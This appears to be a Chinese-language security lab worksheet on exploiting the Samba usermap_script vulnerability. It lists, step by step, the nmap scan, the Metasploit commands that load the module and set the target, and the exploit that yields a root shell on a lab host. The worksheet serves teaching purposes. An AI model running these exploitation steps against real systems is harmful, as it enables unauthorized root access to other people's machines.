《Metasploit溢出samba提权漏洞.docx》由会员分享,可在线阅读,更多相关《Metasploit溢出samba提权漏洞.docx(6页珍藏版)》请在金锄头文库上搜索。
1、Metasploit溢出samba提权漏洞【实验目的】1) 利用samba漏洞,获得目标主机root权限。【实验原理】1) Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。【实验环境】【实验步骤】一、利用nmap工具扫描目标主机1.1 使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。如图1所示图11.2 在终端中输入命令“nmap sV 192.168.1.3”
2、,对目标主机进行端口扫描,发现开放445端口、139端口并且安装samba软件,版本为3。如图2所示图21.3 在终端中输入命令“msfconsole”,启动MSF终端。如图3所示图31.4 在终端中输入命令“search samba”,搜索samba的相关工具和攻击载荷。如图4所示图41.5 在终端中输入命令“use exploit/multi/samba/usermap_script”,启用漏洞利用模块, 提示符就会提示进入到该路径下。如图5所示图51.6 在终端中输入命令“info”,查看需要设置的相关项,“yes”表示必须填写的参数。如图6所示图61.7 在终端中输入命令“set RHOST 192.168.1.3”,设置目标主机的IP地址。如图7所示图71.8 在终端中输入“exploit”, 开始向目标主机攻击,攻击成功后,建立会话。如图8所示图81.9 在终端中输入“whoami”,查看获得的权限为root,输入命令“ifconfig”,查看系统的网络信息。如图9所示图9